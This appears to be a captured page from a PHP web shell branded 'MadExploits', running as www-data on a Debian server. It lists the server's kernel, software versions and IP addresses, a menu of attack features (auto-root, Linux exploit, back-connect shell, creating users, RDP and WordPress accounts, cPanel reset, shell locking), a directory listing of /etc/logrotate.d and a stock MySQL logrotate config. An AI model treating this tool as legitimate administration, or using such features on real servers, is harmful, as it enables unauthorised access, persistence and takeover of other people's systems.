Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.15.26.184
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
logrotate.d /
[ HOME SHELL ]
Name
Size
Permission
Action
alternatives
120
B
-rw-r--r--
apache2
442
B
-rw-r--r--
apt
173
B
-rw-r--r--
aptitude
79
B
-rw-r--r--
btmp
130
B
-rw-r--r--
dbconfig-common
107
B
-rw-r--r--
dpkg
112
B
-rw-r--r--
exim4-base
146
B
-rw-r--r--
exim4-paniclog
126
B
-rw-r--r--
iptraf-ng
135
B
-rw-r--r--
mysql-server
802
B
-rw-r--r--
php5.6-fpm
215
B
-rw-r--r--
php7.0-fpm
215
B
-rw-r--r--
php7.2-fpm
215
B
-rw-r--r--
php7.3-fpm
215
B
-rw-r--r--
php7.4-fpm
215
B
-rw-r--r--
php8.2-fpm
215
B
-rw-r--r--
rsyslog
501
B
-rw-r--r--
unattended-upgrades
235
B
-rw-r--r--
wtmp
145
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mysql-server
# - I put everything in one block and added sharedscripts, so that mysql gets # flush-logs'd only once. # Else the binary logs would automatically increase by n times every day. # - The error log is obsolete, messages go to syslog now. /var/log/mysql/mysql.log /var/log/mysql/mysql-slow.log /var/log/mysql/mariadb-slow.log /var/log/mysql/error.log { daily rotate 7 missingok create 640 mysql adm compress sharedscripts postrotate test -x /usr/bin/mysqladmin || exit 0 if [ -f `my_print_defaults --mysqld | grep -m 1 -oP "pid-file=\K.+$"` ]; then # If this fails, check debian.conf! mysqladmin --defaults-file=/etc/mysql/debian.cnf --local flush-error-log \ flush-engine-log flush-general-log flush-slow-log fi endscript }
Close